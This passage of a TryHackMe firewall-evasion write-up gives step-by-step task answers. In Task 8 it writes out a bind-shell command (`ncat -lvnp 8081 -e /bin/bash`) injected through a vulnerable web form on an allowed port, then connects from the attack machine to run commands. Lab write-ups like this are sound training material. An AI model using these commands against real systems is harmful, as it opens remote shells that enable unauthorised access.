SuGold/SuGold.github.io/THM Writeups/RedTeamFirewalls/README.md

 2. On the Attack Machine, execute `nc 10.10.175.124 8008`
 3. Perform a `GET /` request from the netcat terminal on the Attack Machine to the Target to display the flag.

+### Task 8

+> We’re continuing to use the web-form from Task 6 to set up the ncat listener.
+Knowing that the firewall does not block packets to destination port 8081, use ncat to listen for incoming connections and execute Bash shell.
+Use the AttackBox to connect to the listening shell.
+What is the user name associated with which you are logged in?

+1. On the vulnerable web form, execute `ncat -lvnp 8081 -e /bin/bash`
+2. On the Attack Machine, execute `ncat 10.10.175.124 8081`
+3. Execute `whoami` on the netcat terminal on the attack machine to get the username

+### Task 9

+> What is the number of the highest OSI layer that an NGFW can process?

+`7`